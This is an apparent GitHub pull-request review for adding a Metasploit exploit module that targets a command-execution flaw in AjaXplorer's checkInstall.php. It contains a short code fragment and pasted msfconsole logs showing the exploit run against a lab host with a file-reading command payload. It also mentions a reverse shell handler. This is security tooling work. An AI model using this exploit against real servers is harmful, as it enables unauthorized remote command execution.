Add OSVDB-63552 AjaXplorer module (2010) #900
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Testing! |
| print_error("#{peer} - This server may not be vulnerable") | ||
| else | ||
| print_status("#{peer} - Command output from the server:") | ||
| print_line(m[1]) |
There was a problem hiding this comment.
Using ruby 1.9 I get the output if I modify it to:
print_line(m)
msf exploit(ajaxplorer_checkinstall_exec) > show options Module options (exploit/multi/http/ajaxplorer_checkinstall_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST 192.168.1.130 yes The target address RPORT 80 yes The target port TARGETURI /AjaXplorer-2.5.5/ yes The base path to AjaXplorer VHOST no HTTP server virtual host Payload options (cmd/unix/generic): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cat /var/www/AjaXplorer-2.5.5/index.php yes The command string to execute Exploit target: Id Name -- ---- 0 AjaXplorer 2.5.5 or older msf exploit(ajaxplorer_checkinstall_exec) > rexploit [*] Reloading module... [*] 192.168.1.130:80 - The server returned: 200 OK [*] 192.168.1.130:80 - Command output from the server:
|
Working with:
[] Started reverse double handler id
msf exploit(ajaxplorer_checkinstall_exec) > show options Module options (exploit/multi/http/ajaxplorer_checkinstall_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST 192.168.1.130 yes The target address RPORT 80 yes The target port TARGETURI /AjaXplorer-2.5.5/ yes The base path to AjaXplorer VHOST no HTTP server virtual host Payload options (cmd/unix/generic): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cat /var/www/AjaXplorer-2.5.5/index.php yes The command string to execute Exploit target: Id Name -- ---- 0 AjaXplorer 2.5.5 or older msf exploit(ajaxplorer_checkinstall_exec) > rexploit [*] Reloading module... [*] 192.168.1.130:80 - The server returned: 200 OK [*] 192.168.1.130:80 - Command output from the server: ? [*] Exploit completed, but no session was created. After modify L:101 according to my comment output is printed in my case. Awaiting for sinn3r check and response before merging. |
Because the original script used match()
|
Corrected. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This pull request was created on behalf of David Maciejak, who emailed it to our dev mailbox. Old bug.
This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable.